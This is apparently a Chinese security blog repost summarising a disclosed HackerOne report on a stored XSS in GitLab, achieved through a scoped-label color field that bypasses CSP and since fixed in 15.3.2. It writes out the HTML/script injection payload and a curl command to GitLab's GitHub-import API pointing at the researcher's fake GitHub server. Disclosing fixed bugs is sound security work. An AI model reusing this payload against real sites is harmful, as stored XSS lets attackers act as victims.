最新H1漏洞披露:通过作用域标签绕过 CSP 的存储 XSS,获得$13,950赏金奖励
2023-2-21 16:26:58 Author: 骨哥说事(查看原文) 阅读量:14 收藏

H1最近披露了一处GitLab的漏洞,白帽通过作用域标签绕过CSP,从而实现存储型XSS攻击,该漏洞已经在 Gitlab 15.3.2 版本修复。


要复现该漏洞,需要以下前提条件:

  • Scoped 标签在 Gitlab Premium 中可用,因此需要通过免费试用来获得一个高级帐户

  • 一个 Gitlab 个人访问令牌(可通过
    https://gitlab.com/-/profile/personal_access_tokens?name=test&scopes=api
    申请获得)

Github 不允许创建任意颜色的标签,可以在附件中找到一个虚拟 Github 服务器,然后在其中设置了一个新标签:

  • name: yvvdwf::label-name (the :: to scope the label)

  • color: ">yvvdwf-label<form class='hidden gl-show-field-errors'><input title='<script>alert(document.domain)</script>'>

为了便于复现和验证漏洞,白帽在自己的VPS http://51.75.74.52:11211 上托管了虚拟Github服务器。

打开一个terminal,然后运行以下命令,其中:

  • $GL_TOKEN 是上面创建的 api token

  • yvvdwf-group-a 是一个具有高级功能的组(或帐户)名称

代码示例:

curl -kv "https://gitlab.com/api/v4/import/github" \  --request POST \  --header "content-type: application/json" \  --header "PRIVATE-TOKEN: $GL_TOKEN" \  --data '{    "personal_access_token": "ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",    "repo_id": "523303538",    "target_namespace": "yvvdwf-group-a",    "new_name": "xss-on-label-color",    "github_hostname": "http://51.75.74.52:11211"}'

完成后,可以查看导入项目的标签列表,应该会看到由该脚本创建的弹出窗口

Document.domain

因为可以控制标签的颜色,所以可以使用 CSP-Bypass 在另一个位置创建存储XSS,而不是使用特定于 GitLab 列出标签的页面上创建存储的XSS,例如:

  • https://gitlab.com/yvvdwf-group-a/xss-on-label-color/-/labels

  • https://gitlab.com/yvvdwf-group-a/xss-on-label-color/-/issues/


漏洞影响:

有 CSP-bypass 的 存储型 XSS 允许攻击者对受害者执行任意操作。

希望本文能对你有所收获,欢迎转发分享~

本文原文:https://hackerone.com/reports/1693150

====正文结束====


文章来源: http://mp.weixin.qq.com/s?__biz=MjM5Mzc4MzUzMQ==&mid=2650256126&idx=1&sn=05babe6a878dce93d56c1d40041eea12&chksm=be92d97a89e5506ca4fce687e6338f6c0b6cc317624b1dd99208a22f84e76042d4ed1cd1e372#rd
如有侵权请联系:admin#unsafe.sh